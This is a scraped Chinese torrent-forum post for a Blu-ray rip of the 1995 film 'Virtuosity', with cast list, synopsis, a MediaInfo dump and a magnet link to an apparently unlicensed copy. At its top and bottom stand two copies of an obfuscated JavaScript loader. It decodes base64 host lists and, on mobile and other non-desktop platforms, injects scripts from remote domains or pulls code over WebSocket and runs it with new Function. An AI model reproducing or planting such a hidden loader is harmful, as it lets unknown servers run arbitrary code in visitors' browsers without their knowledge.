时空悍将[繁体字幕].Virtuosity.1995.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 11.86GB

版主小s 1月前 393

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 时空悍将 / 杀人硬件 6·7

◎片 名 Virtuosity

◎年 代 1995

◎产 地 美国

◎类 别 动作 / 科幻 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1995-08-04

◎IMDb链接 https://www.imdb.com/title/tt0114857/

◎豆瓣评分 6.4/10 (2839人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293679/

◎片 长 106 分钟

◎导 演 布雷特·莱纳德 Brett Leonard (id:1045344)

◎演 员 丹泽尔·华盛顿 Denzel Washington (id:1054431)

凯莉·林奇 Kelly Lynch (id:1055683)

罗素·克劳 Russell Crowe (id:1016674)

威廉·弗西斯 William Forsythe (id:1019063)

威廉·菲克纳 William Fichtner (id:1036360)

Ed Marques Ed Marques (id:1287020)

Robert McMinn Robert McMinn (id:1291700)

加里·卢切西 Gary Lucchesi (id:1290411)

德博拉·阿奎拉 Deborah Aquila (id:1277347)

Jane Shannon-Smith Jane Shannon-Smith (id:1297325)

Nilo Rodis-Jamero Nilo Rodis-Jamero (id:1295855)

杰·哈特 Jay Hart (id:1286155)

克里斯·瓦拉斯 Chris Walas (id:1300275)

米克·罗杰斯 Mic Rodgers (id:1295865)

Daniel Kramer Daniel Kramer (id:1288968)

Dobbie Schiff Dobbie Schiff (id:1302632)

◎标 签 科幻 / 美国 / 动作 / 丹泽尔·华盛顿 / 1995 / 美国电影 / DenzelWashington / RussellCrowe

◎简 介

故事发生在一个电脑科技极为发达的年代,一名科学家发明了一个杀人程序协助警方办案,其中集结了数百名连环杀手的资料和他们的作案手法。这个程序是如此的邪恶,最后不仅生成了个人意志,更拥有了人类的外表和可以随时修复任意损伤的特殊能力,它从禁锢中逃脱了出来,在世间作恶。

为了捕捉这位邪恶的“凶手”,警方设计了一个追踪仪器,罪犯帕克(丹泽尔·华盛顿 Denzel Washington 饰)被选中成为了仪器的试验品。帕克曾经亦是一名警察,却因为动用私刑杀死了让他家破人亡的杀手而被免除了职务打入大牢。而让帕克感到在意的是,在杀人程序中,亦有当年杀害他家人的那名杀手的存在。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 313097916219582490403593164702968212224 (0xEB8C7719C9E6C88D97A16D91B4646B00)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.9 GiB

  8. Duration : 1 h 45 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.0 Mb/s

  11. Encoded date : UTC 2021-10-18 06:39:17

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 45 min

  21. Bit rate : 11.4 Mb/s

  22. Width : 1 920 pixels

  23. Height : 818 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.304

  31. Stream size : 8.47 GiB (71%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 11446 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x818 / interlace=0 / total-frames=152345 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 45 min

  49. Bit rate mode : Variable

  50. Bit rate : 4 506 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 3.33 GiB (28%)

  58. Title : English DTS-HD Master Audio 5.1 @ 4506 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 36 min

  68. Bit rate : 26.3 kb/s

  69. Count of elements : 1822

  70. Stream size : 18.2 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 36 min

  81. Bit rate : 27.0 kb/s

  82. Count of elements : 1862

  83. Stream size : 18.7 MiB (0%)

  84. Title : Eng/SUP SDH

  85. Language : English

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 45 min

  94. Bit rate : 16.4 kb/s

  95. Count of elements : 1776

  96. Stream size : 12.3 MiB (0%)

  97. Title : Cht/SUP 原盘繁体(HK)

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Text #4

  102. ID : 6

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 45 min

  107. Bit rate : 16.0 kb/s

  108. Count of elements : 1766

  109. Stream size : 12.1 MiB (0%)

  110. Title : Cht/SUP 原盘繁体(TW)

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No


  114. Menu

  115. 00:00:00.000 : en:第 01 章

  116. 00:07:48.843 : en:第 02 章

  117. 00:12:16.235 : en:第 03 章

  118. 00:16:12.597 : en:第 04 章

  119. 00:18:01.372 : en:第 05 章

  120. 00:21:19.195 : en:第 06 章

  121. 00:25:11.385 : en:第 07 章

  122. 00:31:30.931 : en:第 08 章

  123. 00:35:41.473 : en:第 09 章

  124. 00:40:19.250 : en:第 10 章

  125. 00:48:51.137 : en:第 11 章

  126. 00:52:28.062 : en:第 12 章

  127. 00:56:36.518 : en:第 13 章

  128. 01:02:41.883 : en:第 14 章

  129. 01:06:55.136 : en:第 15 章

  130. 01:12:33.849 : en:第 16 章

  131. 01:20:54.516 : en:第 17 章

  132. 01:27:40.380 : en:第 18 章

  133. 01:32:57.071 : en:第 19 章

  134. 01:38:44.877 : en:第 20 章




复制代码



TAGS 动作 惊悚 犯罪 科幻

磁力链:
  • magnet:?xt=urn:btih:4D24BA4EBFFB4E82C57E0C4DCFB2D94760F4E3B4

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};